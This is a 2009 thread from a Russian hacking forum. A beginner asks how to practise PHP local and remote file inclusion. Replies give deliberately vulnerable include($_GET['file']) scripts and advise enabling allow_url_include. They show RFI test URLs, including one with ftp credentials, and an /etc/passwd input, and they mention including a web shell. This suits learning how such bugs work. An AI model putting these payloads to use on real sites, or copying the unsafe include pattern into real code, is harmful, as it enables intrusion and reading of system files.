11.11.2009, 01:10
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Да и зачем инклудить то что в свою очередь тоже что-то инклудит?)) Если уж и есть уязвимость,то правильней было бы инклудить шелл,или какой-нить код,который надо выполнить,например копирование шелла,вотъ...
я не понимаю .. на локалке. т.е. ?
там,где якобы уязвимость. |
|
|
11.11.2009, 01:11
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2B1t.exe, омг.
PHP код:
<?
Include ("$page.php");
?>
Точки забыл убрать)
Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена.
Затем можешь заюзать такой скриптек:
PHP код:
<?
$inc = $_GET['file'];
include ($inc);
?>
И реализовуй:
Код:
localhost/script.php?file=http://google.com
Затем постепенно усложняй:
PHP код:
<?
$inc = $_GET['file'];
if(file_exists($inc))
{
include ($inc);
}
else
{
echo 'ERROR!';
}
?>
И снова реализовуй:
Код:
localhost/script.php?file=ftp://login:pass@host/file.php
И так далее.
Так же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w:
https://forum.antichat.ru/thread106780.html
По аналогии и с ЛФИ, нy кароче ты понял)
Последний раз редактировалось Ins3t; 11.11.2009 в 01:17..
|
|
|
|
11.11.2009, 01:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Ins3t
нy кароче ты понял)
Сомневаюсь...
B1t.exe, если ты действительно хочешь научиться LFI, RFI, да и вообще поиску уязвимостей, советую тебе сначала изучить пыху хотя бы поверхностно.
|
|
|
|
11.11.2009, 01:25
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
))))))) ага, точно ! спасибо большое.
У меня на этом сервере нет ничего. я специально брал домен и хост для тренировки. хост конечно, бесплатный, но поддерживает почти все, что надо.
|
|
|
|
11.11.2009, 01:26
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
я специально брал домен и хост для тренировки
о___О
А на своей тачке потестить не судьба?)
|
|
|
|
11.11.2009, 01:27
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
mailbrush
Ok. скачаю видеокурсы, и посмотрю/послушаю. сам ужестыдно спросить каждую мелочь..
|
|
|
|
11.11.2009, 01:29
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Ins3t
сюдьба, даже есть денвер. просто смотря некоторые ролики в ютубе, сделал вывод, что надо иметь свой хост, чтоб туда грузить скрипты чтоб с сайтахинклюдить туда(или оттуда).. блин, уже запутался ))))))
|
|
|
|
11.11.2009, 01:40
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Для использования инклуда php знать нинадо ИМХО Прочитай в инете что эта процедура означает и не будет вопросов что инклудить и куда и откуда. И вообще локальный инклуд не часто встречается,удалённый тем более,так что лучше купи пива и раслабся,жизнь она штука сложная,не надо её себе ещё больше усложнять)
|
|
|
|
11.11.2009, 01:47
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от ILYAtirtir
Для использования инклуда php знать нинадо ИМХО
Это сугубо твое мнение.
Сообщение от ILYAtirtir
Прочитай в инете что эта процедура означает и не будет вопросов что инклудить и куда и откуда.
Все взаимосвязано, если он прочитает про инклюд, у него возникнет множество вопросов, ответ на которых он сможет получить, прочитав книжку по PHP.
|
|
|
|
11.11.2009, 06:32
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами:
9328706
Репутация:
1503
|
|
Сообщение от ILYAtirtir
Для использования инклуда php знать нинадо ИМХО
Абсолютно неверно! Если подставить &var=/etc/passwd или &var=http://google.com/? тогда да, а если нет? =) что же делать без знания php? =) Ведь такие инклуды постепенно уходят, а остаются более мудренные, а там одной фантазией не обойдешься!
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
